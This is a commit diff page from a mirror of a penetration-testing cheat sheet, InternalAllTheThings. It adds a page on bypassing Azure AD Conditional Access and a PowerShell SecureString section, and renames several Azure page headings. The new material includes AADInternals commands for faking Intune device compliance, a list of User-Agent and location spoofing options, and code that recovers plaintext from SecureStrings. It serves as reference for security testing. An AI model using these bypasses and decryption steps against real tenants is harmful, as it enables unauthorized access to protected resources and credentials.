swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Conditional Access Policy + PowerShell SecureString

pull/17/head
Swissky 2024-08-16 22:44:24 +02:00
parent ad3877f1dc
commit 693a809664
9 changed files with 101 additions and 44 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
docs/cloud/azure/azure-access-and-token.md
View File

@ -1,4 +1,4 @@
# Azure AD Tokens
# Azure AD - Tokens
## Connection

62
docs/cloud/azure/azure-ad-conditional-access-policy.md Normal file
View File

@ -0,0 +1,62 @@
# Azure AD - Conditional Access Policy
Conditional Access is used to restrict access to resources to compliant devices only.
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
| CAP | Bypass |
|---------------------------|---------|
| Location / IP ranges | Corporate VPN, Guest Wifi |
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
| Azure AD Joined Device | Try to join a VM (Work Access)|
| Compliant Device (Intune) | Fake device compliance |
| Device requirement | / |
| MFA | / |
| Legacy Protocols | / |
| Domain Joined | / |
## Bypassing CAP by faking device compliance
```powershell
# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
```
## Bypassing CAP with device.trustType
The trustType property is an internal attribute that defines the relationship between the device and Azure AD.
When the condition of CAP is `device.trustType -eq "<TYPE>"`, the values can be:
* `AzureAD`: Azure AD joined devices
* `Workplace`: Azure AD registered devices
* `ServerAD`: Hybrid joined devices
## Bypassing CAP with user agent
There are several devices you can use to authenticate and interact with a service.
Try several `User-Agent` to get access to the resources:
* Windows: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100`
* Linux: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq`
* macOS: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq`
* Android: `Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36`
* iOS: `Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1`
* WindowsPhone: `Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36`
## Bypassing CAP with location
Try different IP locations using a VPN.

2
docs/cloud/azure/azure-ad-connect.md
View File

@ -1,4 +1,4 @@
# Azure AD Connect
# Azure AD - Azure AD Connect
| Active Directory | Azure AD |
|-----------------------------------|-------------------|

2
docs/cloud/azure/azure-devices-users-sp.md
View File

@ -1,4 +1,4 @@
# Azure AD IAM
# Azure AD - IAM
> Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource

39
docs/cloud/azure/azure-enumeration.md
View File

@ -1,4 +1,4 @@
# Azure AD Enumerate
# Azure AD - Enumerate
## Azure AD - Collectors
@ -199,43 +199,6 @@ Subdomain Service
```
## Conditional Access Policy
Conditional Access is used to restrict access to resources to compliant devices only.
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
| CAP | Bypass |
|---------------------------|---------|
| Location / IP ranges | Corporate VPN, Guest Wifi |
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
| Azure AD Joined Device | Try to join a VM (Work Access)|
| Compliant Device (Intune) | Fake device compliance |
| Device requirement | / |
| MFA | / |
| Legacy Protocols | / |
| Domain Joined | / |
Bypassing conditional access by faking device compliance
```powershell
# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
```
## Multi Factor Authentication
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services

2
docs/cloud/azure/azure-persistence.md
View File

@ -1,4 +1,4 @@
# Azure Persistence
# Azure AD - Persistence
## Add Secrets to Application

2
docs/cloud/azure/azure-phishing.md
View File

@ -1,4 +1,4 @@
# Azure AD Phishing
# Azure AD - Phishing
## Illicit Consent Grant

2
docs/cloud/azure/azure-requirements.md
View File

@ -1,4 +1,4 @@
# Azure Requirements
# Azure - Requirements
## Pentest Requirements

32
docs/redteam/evasion/windows-defenses.md
View File

@ -10,6 +10,7 @@
* [Just Enough Administration](#just-enough-administration)
* [Contrained Language Mode](#constrained-language-mode)
* [Script Block Logging](#script-block-logging)
* [SecureString](#securestring)
* [Protected Process Light](#protected-process-light)
* [Credential Guard](#credential-guard)
* [Event Tracing for Windows](#event-tracing-for-windows)
@ -168,6 +169,37 @@ function Enable-PSScriptBlockLogging
```
### SecureString
A `SecureString` in PowerShell is a data type designed to store sensitive information like passwords or confidential data in a more secure manner than a plain string. Unlike a regular string, which stores data in plain text and can be easily accessed in memory, a `SecureString` encrypts the data in memory, providing better protection against unauthorized access.
Convert to SecureString
```ps1
$original = 'myPassword'
$secureString = ConvertTo-SecureString $original -AsPlainText -Force
$secureStringValue = ConvertFrom-SecureString $secureString
```
Get the original content
```ps1
$secureStringBack = $secureStringValue | ConvertTo-SecureString
$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureStringBack);
$finalValue = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
```
When a `SecureString` is created, the plain text characters are encrypted immediately using the Data Protection API (**DPAPI**)
Using the AES key
```ps1
[Byte[]] $key = (49,222,...,87,159)
$pass = (echo "AA...AA=" | ConvertTo-SecureString -Key $key)
[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass))
```
## Protected Process Light
Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes.